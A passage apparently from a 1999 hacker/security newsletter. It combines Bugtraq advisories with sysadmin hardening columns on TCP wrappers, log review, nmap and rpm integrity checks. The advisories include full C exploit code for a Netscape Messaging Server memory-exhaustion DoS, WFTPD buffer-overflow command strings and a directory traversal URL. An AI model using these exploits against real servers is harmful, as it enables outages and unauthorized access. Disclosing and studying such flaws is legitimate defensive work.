zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz Second command PASS i want you crash :) Crash.....Overflow. Published by: USSRBACK Luck Martins u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h www.USSRBACK.COM @HWA 53.0 Netscape Messaging Server RCPT TO DoS Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ bugtraq id 748 class Input Validation Error cve GENERIC-MAP-NOMATCH remote Yes local Yes published October 29, 1999 updated October 29, 1999 vulnerable Netscape Messaging Server 3.6 Netscape Messaging Server 3.55 Netscape Messaging Server 3.54 Netscape Messaging server will not de-allocate memory that is used to store the RCPT TO information for an incoming email. By sending enough long RCPT TO addresses, the system can be forced to consume all available memory, leading to a denial of service. Example and exploit by Nobuo Miwa 220 victim.workgroup ESMTP server (Netscape Messaging Server - Version 3.62) ready Thu, 28 Oct 1999 12:13:17 +0900 helo rcpt2 250 victim.workgroup mail from : rcpt2 250 Sender Ok rcpt to: rcpt2@aaaaaaaaaaaaa............. 8000 bytes 250 Recipient #include #include #include #include #include #define STR_HELO "HELO rcpt2\n" #define STR_MAILFROM "MAIL FROM:rcpt2\n" #define RCPT2_LENGTH 8000 #define RCPT2_NUMBER 10000 int openSocket(struct sockaddr_in *si, char *hostIPaddr) { int port=25, sd, rt ; long li ; struct hostent *he; si->sin_addr.s_addr = inet_addr(hostIPaddr); si->sin_family = AF_INET; si->sin_port = htons (port); sd = socket (si->sin_family, SOCK_STREAM, 0); if (sd == -1) return (-1); rt = connect(sd,(struct sockaddr *)si,sizeof(struct sockaddr_in)); if ( rt < 0 ) { close(sd); return(-1); } return(sd) ; } void sendRCPT2(int sd) { char rcptStr[RCPT2_LENGTH], tmpStr[RCPT2_LENGTH+80], strn[80]; int rt, i; memset( tmpStr, 0, sizeof(tmpStr) ) ; recv( sd, tmpStr, sizeof(tmpStr), 0 ); printf("%s",tmpStr); printf("%s",STR_HELO); send( sd, STR_HELO, strlen(STR_HELO), 0 ); memset( tmpStr, 0, sizeof(tmpStr) ) ; rt = recv( sd, tmpStr, sizeof(tmpStr), 0 ); if ( rt>0 ) printf("%s",tmpStr); printf("%s",STR_MAILFROM); send(sd, STR_MAILFROM, strlen(STR_MAILFROM), 0); memset( tmpStr, 0, sizeof(tmpStr) ) ; rt = recv(sd, tmpStr, sizeof(tmpStr), 0); if ( rt>0 ) printf("%s",tmpStr); strcpy( rcptStr, "RCPT TO: rcpt2@" ) ; while ( RCPT2_LENGTH-strlen(rcptStr)>10 ) strcat( rcptStr, "aaaaaaaaaa") ; strcat( rcptStr, "\n" ); for ( i=0 ; i0 ) printf("%s \n",strn); } return; } int main (int argc, char *argv[]) { char hostIPaddr[80], *cc, *pfft; int sd = 0; struct sockaddr_in si; printf("You can use ONLY for YOUR Messaging Server 3.6\n"); if (argc != 2) { printf("Usage: %s IPaddress \n",argv[0]); exit(1); } else strcpy (hostIPaddr, argv[1]); sd = openSocket(&si,hostIPaddr); if (sd < 1) { printf("failed!\n"); exit(-1); } sendRCPT2( sd ); close (sd); exit(0); } Netscape has stated a release date of December 1999 for Messaging Server 4.15, which will not include this vulnerability. Credit Posted to Bugtraq October 29 by Nobuo Miwa . reference message: Netscape Messaging Server RCPT TO vul. (Nobuo Miwa ) @HWA 54.0 WFTPD Remote Buffer Overflow Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ bugtraq id 747 class Boundary Condition Error cve GENERIC-MAP-NOMATCH remote Yes local No published October 28, 1999 updated October 28, 1999 vulnerable Texas Imperial Software WFTPD 2.40 - Microsoft Windows 3.11WfW - Microsoft Windows 3.11 - Microsoft Windows 3.1 - Microsoft Windows 98 - Microsoft Windows 95 - Microsoft Windows NT 4.0 - Microsoft Windows NT 3.5.1 - Microsoft Windows NT 3.5 Texas Imperial Software WFTPD 2.34 - Microsoft Windows 3.11WfW - Microsoft Windows 3.11 - Microsoft Windows 3.1 - Microsoft Windows 98 - Microsoft Windows 95 - Microsoft Windows NT 4.0 - Microsoft Windows NT 3.5.1 - Microsoft Windows NT 3.5 There is a remotely exploitable buffer overflow vulnerability in WFTPD that is known to affect versions 2.34 and 2.40. The overflow exists in the MKD and CWD commands, which if argumented with long strings in the right order, can overrun the buffer and allow for aribtrary code execution on the target host. This is from the BugTraq posting: First command MKD aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaa Second command CWD aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaa Crash.....Overflow. credit First posted to BugTraq by Luciano Martins on Oct 28, 1999. reference web page: WTFPD Homepage (Texas Imperial Software) message: WFTPD v2.40 FTPServer remotely exploitable buffer overflow vulnerability (Luciano Martins ) To: BugTraq Subject: WFTPD v2.40 FTPServer remotely exploitable buffer overflow vulnerability Date: Wed Oct 27 1999 19:07:55 Author: Luciano Martins Message-ID: We found in the WFTPD v2.34,v2.40 Server and earlier a vulnerable to remotely exploitable buffer overflow. This can result in a denial of service and at worst in arbitrary code being executed on the system. The vulnerabilities are the conjunction of two large commands the MKD and CWD if they are passed an argument a string exact of 255 characters, If this 2 large commands are passed in order program crash. Tested in: Windows 98 / Windows Nt Example: First command MKD aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaa Second command CWD aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaa Crash.....Overflow. Luck Martins u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h WWW.USSRBACK.COM 55.0 Pacific Software URL Live! Directory Traversal vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ bugtraq id 746 class Unknown cve GENERIC-MAP-NOMATCH remote Yes local Yes published October 28, 1999 updated October 28, 1999 vulnerable Pacific Software URL Live! 1.0 - Microsoft Windows 98 - Microsoft Windows 95 - Microsoft Windows NT 4.0 The URL Live! free webserver from Pacific software is susceptible to the "../" directosy traversal vulnerability. By using the '../' string in a URL, an attacker can gain read access to files outside the intended web file structure. Example: http ://xyz.com/../../../config.sys credit Posted to Bugtraq by UNYUN on October 28, 1999. reference web page: URL Live! - A Free HTTP Server by PSPINC (Pacific Software) http://www.urllive.com/ message: URL Live! 1.0 WebServer (UNYUN ) @HWA 56.0 InfoSec for Dummies Parts I and II ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ INFOSEC by Dummies - Part I Part one of a four part series by John Johnson October 28, 1999 - Mix some programming code, state-of-the-art hardware, network connections, nerds of all shapes and sizes, hackers, viruses, firewalls, application software, Internet access, World Wide Web sites, and a little oregano, and you will find yourself either at a Microsoft TechNet conference or the front-line of the information security (INFOSEC) battlefield. I want to go on record that I admire, respect, and will always seek guidance from the many men and women that devote their careers to the information technology profession. I do not blame them in their approach to security professionals as "the bad guys trying to shut down their networks or implement so many security features that the network slows down to a crawl at 10,000 micro bits per second speed." There are many security professionals that are trying to educate information technology people about the threats and vulnerabilities of networks that the real bad guys take advantage of to interfere with the proper function of the network and the information systems connected to it. However, I want to emphasize that security professionals working in the information security field are providing support services to information technology, not vice versa. The bottom-line mission is that information networks and systems function properly without any loss to confidentiality, integrity, or availability. Most information management personnel are busy maintaining networks and system access, with little time left to audit access control logs and ensure security features enabled function properly. Security patches are implemented when personnel are notified, but security is given the last consideration. The one positive area that both information technology and security professionals are able to work closely and effectively is increasing user awareness of computer security issues. That partnership and coordination helps to develop a stronger working relationship for security support to information technology personnel. As compliance with the Y2K millennium bug problem is resolved, the next priority focus will be computer security. Some approaches to security problems will be technology-based, but there will remain both non-technical problems and security issues that technology cannot address alone. Personnel security, social engineering, application of law and ethics in conducting investigations, the principles of physical security, and contingency planning are examples of such non-technical issues and problems facing information management. Social engineering is one such non-technical problem that existed long before computers. Many of us with an intelligence background were aware of social engineering techniques for many years. Helping raise user awareness of these techniques and countermeasures to employ is one of the many ways security professionals assist information technology personnel. Security professionals with technical understanding of networks and various protocols that computers use to communicate with each other, is the growing area of support that information security, as part of information assurance, is evolving. But more work is needed and the information assurance field is addressing those issues, both in developing countermeasures to threats and vulnerabilities and by proactively planning protective measures for the networks of tomorrow. Security safeguards are intended as procedures and systems designed to protect an organization's ability to perform its basic business function, not be an obstacle to prevent it. I know many people perceive "security" as problem to overcome or ignore. However, from an operational standpoint, the purpose of security measures is to ensure business success. Stay tuned for the rest of the series: Part Two: Who is in charge? What needs to be protected? Part Three: Detailed laundry list of your vulnerabilities Part Four: What is your INFOSEC disaster recovery plan? John D. Johnson is a security consultant based in California and a former Special Security Officer with the U.S. Government. INFOSEC by Dummies - Part II October 29, 999 - Security is a managerial responsibility; in other words, both senior managers and supervisors are responsible for exercising security in their overall and day-to-day operations. For example, is it the shop supervisor's responsibility or the safety officer's at the corporate level if an employee removes safety features off their equipment and then subsequently gets injured? Who is in charge of the employee? The same concept applies to security. Maintaining the security of an organization's computers required for business is part of business management. Who is responsible for the business management of their personnel? The supervisor and senior manager of the individual or the company security manager? Company security managers are responsible for overseeing the security process and coordinate requirements to accomplish it, they are not responsible for the business functions of company personnel. Rather they are there to assist the supervisor and senior manager in accomplishing the security portion of computer operations. While a senior manager has an overall responsibility for security (like they have for everything else), they obviously cannot perform all the tasks required. Key personnel (including supervisors at all levels) and employees must implement security procedures to ensure protective measures actually work. What needs to be protected? We are increasingly becoming dependent on modern technology that makes us all more productive. Any disruption to that production limits our ability to get the job done. As I mentioned earlier, information systems and networks operate properly when effective security measures (both technical and procedural) are implemented that protect the confidentiality, integrity, and availability of our information and equipment. Confidentiality is protection from unauthorized disclosure; integrity is protection from unauthorized change or destruction; and, availability is protection that ensures that information and equipment are accessible to authorized users when they need it. Easier said than done, but we must try or else suffer the consequences of losing our information or systems that we need to accomplish our work. Why security? The most obvious answer is to comply with laws and company policies that require we take protective measures to safeguard company data and equipment as well as our personnel. But there is more. We need to provide protection of our information and operations to get our work done. We need to protect the privacy of individuals. Protection of information systems permit management at all levels to make sound business decisions on accurate and timely information. We protect our jobs when we keep pace with technology to implement countermeasures that address new vulnerabilities and threats. We also maintain and improve the integrity and reputation of our organization. Facts Let review some facts. Fact: computers are critical to fulfilling your job or supporting your job. Fact: computers are vulnerable. Weaknesses in an information system or components (procedures; hardware designs; internal controls, software bugs; etc.) could be exploited. Fact: there are defined threats to your computer system. While the media highlights stories about hackers, Chinese spies, and intelligence agency Big Brother tactics, the reality is that the insider threat, including accidents and mistakes, is the growing threat and that people place convenience over security in their day-to-day lives. What is information security? The protection of information in all formats, including electronic, hardcopy, magnetic media, etc., against unauthorized access to or modification or destruction of information, whether in storage, processing or transit (across a network), and against the denial of service to authorized users or providing service to unauthorized users, including those measures necessary to detect, document and counter such threats. I love short federal government definitions. Bad things that can happen Undesirable events that can happen are disclosure of sensitive information, modification of information, destruction of data, unauthorized use of data or information (including by an insider), and denial of service to authorized users. How many of you ever think about overhead water sprinklers soaking your computer equipment reacting to a false fire alarm late at night? How many of you who send credit card data over your AOL account really think it is safe? Do we ever leave home without our American Express cards anymore? What are some of the vulnerabilities that computers have? How about the absence of contingency plans, poor user security awareness and training, software errors, poor password selection, vague laws or regulations about computer security overall, open systems, lack of security standardization in the information technology world, poor or limited defenses against automated attacks, and social engineering techniques. Yes, Virginia, there are risks to using computers. But we must use them. The best we can do is use security countermeasures to help reduce that risk. Increasing threat awareness training is our number one countermeasure to solving the long-term computer security problem. Today, a typical computer can be turned on by anyone, operated by anyone, opened up by anyone, and carried off by anyone. The computer doesn't check your ID when you come up to it. A major reason for the lack of threat awareness by people is the failure to grasp what can be lost through security breaches. Stay tuned for the rest of the series: Part One: Introduction Part Two: Who is in charge? What needs to be protected? Part Three: Detailed laundry list of your vulnerabilities coming November 4 Part Four: What is your INFOSEC disaster recovery plan? coming November 5 John D. Johnson is a security consultant based in California and a former Special Security Officer with the U.S. Government. @HWA 57.0 Thwarting the systems cracker parts 1 to 6 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Thwarting the System Cracker, Part 1 by Marcel Gagné 23-Sep-1999 Welcome to your weekly dose of System Administration. Before we dive headlong into this week's topic, allow me a quick introduction. This column is the first of a weekly series in which I intend to tackle stories and ideas that are near and dear to the Linux system and network administrator's heart. My plan is to address issues for users of all levels--from the person who was made administrator because he or she dared admit they "knew a little about computers" (often followed with "Congratulations! You are now in charge of the entire company's IT well-being.") to the experienced, married-to-the-job systems and network people who go home and dream about print queues, system performance, resource management, and penguins. That said, I invite readers to e-mail me (mggagne@salmar.com) and let me know what topics you would like to see covered that relate to the care and feeding of Linux servers and how to keep them healthy and happy. As time goes on, I'll try to deal with as many of those issues as I can. 'Nuff said! Let's move on to this week's topic: the growing scourge of the network cracker ... In the last few months, I've answered an increasing number of calls from people whose systems have been cracked. Usually they're not aware of this, and the call starts out more like: "There seems to be something wrong with my e-mail. Could you have a look at it?" I log on, do a quick look around and see his footprints everywhere. A wily cracker has struck again. When you set up your Linux system, you brought up a powerful, high-level, multi-tasking network operating system--one that was maybe a little too powerful. Out of the box, some distributions start a large number of services (rlogind, inetd, httpd, innd, fingerd, timed, rhsd, and others). Do you know what they all are? I do. As Sys Admin, you've got enough things to worry about, such as that hung printer, but if your machine is exposed to the Internet, you should pay particular attention. Most crackers don't tend to be innovators. They use the latest distributed exploits (programs and/or techniques) to break through a well-known or recently uncovered security hole in your system. The good news is that you, as a security administrator, are just as capable of becoming aware of these exploits. Regular visits to your Linux distribution web site such as Red Hat or Caldera Systems are a good way to stay on top of the latest patches to stop those exploits. While you're at it, find out about the exploits themselves by checking out the bugtraq forum or CERT, to name just a couple. Innovators or not, cracking a system is made so much easier if the door to your server is left wide open. The simplest means of controlling access (short of turning off your machine) is through a program called a TCP wrapper. Odds are you loaded it as part of your system install. Using the wrapper, we can restrict access to some of those services I mentioned earlier. Best of all, the wrapper logs attempts to gain entry to your system, so you can track who is testing the locks on your virtual doors. If you do not need to have people logging in to your system (using telnet or rlogin), then you should close the door to remote access by adding this line to your /etc/hosts.deny file: ALL:ALL The first ALL refers to all services. The second ALL refers to everybody. Nobody gets in. Y'hear? Now, we should probably let the people on your internal network have access (no?). I'll pretend you've set up your LAN with the approved internal network addressing scheme as detailed in RFC 1918 (What's an RFC? Hmm ... we do have a lot to cover.) I'll use a class C network at 192.168.1x for our example. We'll also add your localhost (127.0.0.1) network. Here's the hosts.allow entry: ALL: 127.0.0.1 ALL: 192.168.1. Yes, that's right. There's a dot after the one and nothing else. Now everyone in the 192.168.1.whatever network can get in to your system. Now, restart your inetd process. /etc/rc.d/init.d/inet restart Safe, right? Not exactly. The hosts.deny file controls access only to services listed in /etc/inetd.conf and wrapped by /usr/bin/tcpd, your TCP wrapper. The wrapper looks at incoming network requests, compares them to what is in your hosts.allow and hosts.deny files, and makes a yes or no decision on what to allow through. You could be running services not covered by the wrapper, or you may not have had the wrapper configured and our cracker has already gotten through. How can you tell? How can you make your system even more secure? More on that next week. Until then, fix that printer, will you? Thwarting the System Cracker, Part 2 by Marcel Gagné 4-Oct-1999 Reading the trail: what a TCP wrapper can tell you. Hello everyone. Thanks for coming back. Thanks also for the enormous feedback on last week's article. The vast majority seemed to appreciate my "start small and work your way up" approach to administration. While security administration may seem like an enormous topic to start with, I thought it was important enough to cover now rather than later. As mentioned, I will take all comments into consideration and try to gear this series around the majority of those suggestions. Last week, I provided some insight into the simplest method of protecting your system, the TCP wrapper. Your Linux system does a great job of tracking access through its system logs, and denying access through the wrapper means you've just added some useful information to those logs. Change to the /var/log directory and list the files there with ls. # cd /var/log # ls Here's a sample of what you should see there. boot.log cron cron.1 cron.2 dmesg httpd lastlog lastlog.1 maillog maillog.1 maillog.2 messages messages.1 netconf.log netconf.log.1 netconf.log.2 secure secure.1 secure.2 secure.3 secure.4 spooler spooler.1 spooler.2 uucp wtmp wtmp.1 xferlog xferlog.1 xferlog.2 Notice how the various log files have a dot-1, 2, 3, or dot-4 extension. This happens on a regular basis when your system runs its cron.daily files. Actually, cron.daily is a directory under /etc and contains a number of administration scripts that your system runs automatically. Without you lifting a finger, Linux uses these scripts to keep things tidy, such as rotating your log files so they don't grow to enormous proportions (like in the old days of UNIX, when I had to walk 14 miles to school uphill in both directions and had to do my own log file pruning). Have a look at those cron jobs, and familiarize yourself with what happens there. These are text files--you can more them, or vi, or read them in emacs. While you are at it, notice that the system also has a cron.hourly, cron.weekly, and cron.monthly. A couple of those directories may be empty. The actual dates and times for hourly, weekly, and so on are in the /etc/crontab file. From a cracker detection point of view, your secure.? file will be of particular interest. If you turned off all access (other than your local network) as described last week, you can check for possible attempts like this: grep refused /var/log/secure* Here's the output of an actual attempt. I've blanked out the address for (ahem) security reasons. Sep 12 07:52:42 netgate in.rlogind[7138]: refused connect from 2??.?.5?.?42 Sep 12 07:52:52 netgate in.rshd[7139]: refused connect from 2??.?.5?.?42 Sep 12 07:52:55 netgate in.rexecd[7144]: refused connect from 2??.?.5?.?42 Sep 12 07:52:59 netgate imapd[7146]: refused connect from 2??.?.5?.42 Sep 12 07:52:59 netgate in.fingerd[7142]: refused connect from 2??.?.5?.?42 Sep 12 07:53:00 netgate ipop3d[7143]: refused connect from 2??.?.5?.?42 Sep 12 07:53:07 netgate in.ftpd[7147]: refused connect from 2??.?.5?.?42 Sep 12 07:53:10 netgate gn[7145]: refused connect from 2??.?.5?.?42 Sep 12 07:53:22 netgate in.telnetd[7149]: refused connect from 2??.?.5?.?42 Sep 12 07:56:34 netgate imapd[7150]: refused connect from 2??.?.5?.?42 As you can see, my cracker tried several ports, or services, on my server, netgate, all of which were refused because of my wrapper's configuration and the resulting logs. I took the information from this log and e-mailed it to the security authority of the ISP the cracker was using. Now, this doesn't mean the cracker will never get in, but you know they are trying and that's a great start. You can also more some of the other files for additional information. The maillog files will give you a picture of what e-mail messages are routing through your machine. If you'd like to see ftp transfers to and from your machine, have a look at the xferlog files. The other file of interest here is wtmp. To view the contents of wtmp, use the last command--you cannot simply cat or more this file. However, you might want to pipe the output of last to more. # last | more fishduck ttyp6 nexus Tue Sep 28 16:03 still logged in birdrat ttyp5 speedy Tue Sep 28 15:57 still logged in root tty1 Tue Sep 28 12:54 still logged in This will give you the contents of the wtmp file which details who logged in when, for how long, and whether they are still logged in. Make sure these are all people who you want to have access. Maybe you don't know who birdrat is. If you haven't checked your logs in a while and you would like to see what is in wtmp.1, use this version of the last command: # last -f /var/log/wtmp.1 | more The last thing (no pun intended) I would like you to consider this week is the state of the logs themselves. If you find too little activity in your logs, or the logs tend to be sized at zero bytes or missing altogether, that is also important information. Knowing something is amiss is the first step towards doing something about it. I've run out of space for this week, but let me finish by giving you a hint of where we'll go next. We'll visit the various services, discuss what they do, and decide whether you need them at all. As a treat, I'll show how to use a popular hacker tool, the port scanner, to better secure your own system. Thwarting the System Cracker, Part 3 by Marcel Gagné 7-Oct-1999 Getting to know your enemy through network ports and port scanners. For the serious newbies out there, here's how networks work on a really, really basic level. Your system's master process, the one that got the system going (after you pushed the 'on' switch that is) is called 'init'. init's process ID is 1. It is always 1. If you want to check it out, find init in your process table using 'ps'. # ps ax | grep init 1 ? S 6:03 init One of the services that init starts when your system boots is 'inetd'. Its job is to listen for network requests which it references by way of internet socket numbers or ports. For instance, when you telnet to your system by typing "telnet mysystem", you are actually requesting that inetd on mysystem starts an in.telnetd process which handles communication over port 23. Then, in.telnetd starts a process which eventually asks for your login name and password and, miraculously, you are logged in. Basically, inetd listens to find out what other daemons should wake up to answer the port request. If you want to see what those service numbers translate to, do a 'more' (or 'less') on /etc/services, a text file that lists the known TCP service ports. From a resources perspective, it makes sense to have a single process listening rather than one for each and every service. For those of you who can remember and visualize such things, picture Lily Tomlin as the telephone operator who (eventually) patches people through to the party to whom they wished to speak. She is inetd and the people to whom you wish to speak are the service deamons. You request extension 23 and eventually, she puts you through. When inetd starts, it reads a file called inetd.conf . You'll find this one in your '/etc' directory. Here are a couple of sample lines from inetd.conf. # # These are standard services. # ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd # # Shell, login, exec, comsat and talk are BSD protocols. # shell stream tcp nowait root /usr/sbin/tcpd in.rshd login stream tcp nowait root /usr/sbin/tcpd in.rlogind #exec stream tcp nowait root /usr/sbin/tcpd in.rexecd When a cracker first visits your site with the intention of breaking in, he will often employ a tool known as a port scanner to find out what inetd is listening for on your system. One of my favorite port scanners is nmap. You can pick up nmap from http://www.insecure.org/nmap/index.html . The latest version even comes with a nice GUI front end called nmapfe. Let's run nmap against my test system and see what we get. The options are '-sS', for TCP SYN, or half-open scan, and '-O', for OS fingerprinting. OS fingerprinting means that nmap will try to guess the OS version running on the system. A cracker who knows what release of an OS you are running will use that information to decide on the most likely exploits for a successful entry. Here's the nmap command and the output from my test system. # nmap -sS -O localhost Starting nmap V. 2.3BETA5 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/) Interesting ports on localhost (127.0.0.1): Port State Protocol Service 21 open tcp ftp 23 open tcp telnet 25 open tcp smtp 53 open tcp domain 79 open tcp finger 80 open tcp http 98 open tcp linuxconf 111 open tcp sunrpc 113 open tcp auth 139 open tcp netbios-ssn 513 open tcp login 514 open tcp shell 515 open tcp printer TCP Sequence Prediction: Class=random positive increments Difficulty=4360068 (Good luck!) Remote operating system guess: Linux 2.1.122 - 2.2.12 Nmap run completed -- 1 IP address (1 host up) scanned in 2 seconds Those open ports are the jumping off point for your cracker. With this information, they know what to bother with and what to forget about. If there is no daemon listening on a network port, why bother trying to get in that way? Now, go back and look at your /etc/inetd.conf file. Notice that exec is commented out (there's a hash mark , '#', or octothorp, at the beginning of the line) but login is not. If you reference that with the output of nmap, you'll see that those services not commented out in inetd.conf are listed while those with the hash mark at the beginning are not. This is how you shut down unnecessary ports monitored by inetd. Your TCP wrapper is keeping an eye on those ports, but if no one needs to have access to remote shell, why have inetd listen for it at all? The wrapper's job is to provide access to specific services for specific IP addresses. In the first article, we did the quick lock-down with the wrapper. Now, go through your list of services, decide what you need and what you don't, then disable the don'ts by commenting out those lines. To activate the changes, you need to restart inetd. Find inetd's process id and send a SIGHUP to it. That means you do a 'kill - 1' on the process. BE CAREFUL. A 'kill dash 1' looks an awful lot like a 'kill 1'. Do you remember what process had id 1? Kill init and you kill the whole system. If you are worried and don't mind typing a few extra keystrokes, use 'kill -SIGHUP' instead of 'kill -1'. Now, let's re-run nmap. Starting nmap V. 2.3BETA5 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/) Interesting ports on localhost (127.0.0.1): Port State Protocol Service 21 open tcp ftp 23 open tcp telnet 25 open tcp smtp 53 open tcp domain 80 open tcp http 111 open tcp sunrpc 113 open tcp auth 139 open tcp netbios-ssn 515 open tcp printer TCP Sequence Prediction: Class=random positive increments Difficulty=3487082 (Good luck!) Remote operating system guess: Linux 2.1.122 - 2.2.12 Nmap run completed -- 1 IP address (1 host up) scanned in 3 seconds This last run is the same as the one previous from a command standpoint, but finger, linuxconf, shell, and login are gone. I could argue that the smart thing would have been to leave rlogin in place and deactivate telnet, but keep in mind that this is an example. Disabling telnet may not be appropriate for your location. For those services that are run by inetd, disabling them in this manner completely removes them from external access, even beyond your /etc/hosts.allow file (discussed in the first part of this series). What should you disable? If you are running a single, private machine that does not require anyone in the outside world to access it, then just about everything in the list could go. However, if you have a small network with a couple of PCs, you may still want to run ftp, telnet, or rlogin. One final note. Use tools like port scanners wisely. Use them only to test the security of your own systems and never, never use them to scan other people's systems. Remember, just as you are learning to deal with and watch for the cracker, so can others watch you. You're right. There's lots more, but once again, I've gone way over my allotted space for the week. Next time around, I'll show you how your system package tools can help you determine if some of you files have been compromised. Until then, take care, and happy hunting. Thwarting the System Cracker, Part 4 by Marcel Gagné 14-Oct-1999 This week's episode: verifying the integrity of your files. Comedian Steven Wright expresses an interesting dilemma. Someone broke into his house, he says, stole everything and replaced all those things with an identical copy. In the world of the system cracker, this isn't such a crazy idea. Here's what happens. Using some well-known hole or exploit, a cracker finds his or her way onto your system. Yet, when you do a "ps", there is no evidence. When you do an "ls", there is no evidence. You think your password file looks normal but you can't be sure. What to do? One of the first things your cracker will do is replace certain files on your system. You will wind up with a new version of "netstat" so that a "netstat -a" does not show any evidence of your cracker's presence. The cracker will also replace any file that might give him or her away. Some of those files are as follows. /bin/ps /bin/netstat /usr/bin/top Since the files have been replaced, simply doing an "ls" will only confirm that the files are there. There are a number of ways that you can detect modified files on your system. If you are running Red Hat, Caldera, TurboLinux, or any of the releases that use the Red Hat Package Manager (aka RPM) concept, I'm going to show you a cool way to do this. The first thing you need to do is find out what package these files came from. Using the rpm command , you can identify the location of a file (say "netstat") with this version of the command. # rpm -qf /bin/netstat The system comes back with this reply. net-tools-1.51-3 Now, I can scan this entire package to find out what has been changed with this version of the rpm command. rpm -V net-tools (You can leave off the version info) Now, on my test system, I've modified my "/bin/netstat" binary (I replaced the 6.0 version with 5.2 in this case). The result of the above command should be nothing -- a return to the shell prompt (the hash mark). Instead, I get this. .......T /bin/netstat The "/bin/netstat" file shows up as having been modified. If I check using rpm (rpm -qf /bin/ps) for the location of "ps" and "/usr/bin/top", I find that they belong to the "procps" package. I will then run an rpm verify on procps. Here's a sample output from a hacked system. # rpm -qf /bin/ps procps.2.0.2-2 # rpm -V procps SM5..UGT /bin/ps SM5..UGT /usr/bin/top Our cracker has gone in and replaced our version of "ps" and "top" so that we cannot see the processes he is running, maybe a sniffer or an irc "bots". The sniffer, by the way, is a program that essentially watches all your users' comings and goings and traps their passwords so that the cracker can use valid user logins to do their work, further hiding their tracks. I'll give you a quick script now to run through your entire rpm database and check all your packages for tampering. Before I do that, I want to give you a warning. Not all files flagged by this report are hacked. For instance, the password file on your system is not the same as it was when it was first installed. After all, you added at 